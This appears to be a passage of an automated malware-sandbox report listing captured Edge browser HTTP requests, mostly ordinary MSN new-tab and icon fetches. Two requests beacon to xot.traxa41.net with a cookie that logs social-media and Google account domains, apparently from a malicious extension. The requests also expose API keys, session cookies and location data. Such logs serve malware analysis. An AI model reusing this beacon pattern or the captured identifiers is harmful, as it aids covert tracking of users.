Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/libs_super-feed_dist_feed-manager_FeedManagerWithClientAd_js-node_modules_fluentui_svg-icons_-8f340f.92749e5d36b29b902c76.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/graph/actions?%24top=20&%24filter=actionType+eq+%27Follow%27+and+%28targetType+eq+%27Location%27%29&apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic HTTP traffic detected: GET /service/msn/user?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/v1/news/users/me/locations?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=pdp-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nas-highlight-v1.ad1f555a047bcac24a4a.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/segments/recoitems/weather?apikey=UhJ4G66OjyLbn9mXARgajXLiLw6V75sHnfpU60aJBB&activityId=E77229BA-D79F-43CA-83B8-B957C0F02B66&ocid=weather-peregrine&cm=en-us&it=app&user=m-09C025F5A71D6FE2180F319FA60A6E8D&scn=APP_ANON&units=F&appId=4de6fc9f-3262-47bf-9c99-e189a8234fa2&wrapodata=false&includemapsmetadata=true&cuthour=true&filterRule=card&distanceinkm=0&regionDataCount=20&orderby=distance&days=5&pageOcid=anaheim-dhp-peregrine&source=undefined_csr&hours=13&fdhead=prg-1sw-wxmptreplace&contentcount=3&region=us&market=en-us&locale=en-us&lat=33.75510787963867&lon=-84.39060974121094 HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/taskbar_v10/Condition_Card/SunnyDayV3.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /weathermapdata/1/static/weather/Icons/taskbar_v10/WindyV2.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=09C025F5A71D6FE2180F319FA60A6E8D; _EDGE_S=F=1&SID=14B0D2560B6E6C25271CC63C0A196DE9; _EDGE_V=1; _SS=SID=00; MUIDB=09C025F5A71D6FE2180F319FA60A6E8D; _C_ETH=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nas-highlight-v3v4.5873ec4aa566b5d8efc3.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ext/antlog?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: gxid=6628213c59b94; installed=true; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com; safe-installed-internal=true
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nativeadstemplates.3d1fd5b812e57319e143.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/node_modules_xmlbuilder2_lib_xmlbuilder2_min_js.365db5621a87ab118310.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /ext/antlog?1=1&from=Chrome3 HTTP/1.1Host: xot.traxa41.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: gxid=6628213c59b94; installed=true; clog=.facebook.com-.twitter.com-.instagram.com-www.google.com-accounts.google.com-ogs.google.com-.google.com-www.youtube.com-.youtube.com
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/pill-wc.87e5c35451d51ad2c9c1.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SignInData.70016e6eaece05b76578.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/sticky-peek.8a52a328061c5a4af40c.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/waterfall-view-feed.da1860afbfeb79eba90c.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-card-wc.6e8a0415b27366196d3f.js HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1cEE23?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Excel_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/OneDrive_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/OneNote_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Outlook_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/PowerAutomate_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/PowerBI_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/PowerPoint_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/SharePoint_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Skype_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Sway_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Teams_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Visio_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons/office-icons/Word_24x.svg HTTP/1.1Host: assets.msn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
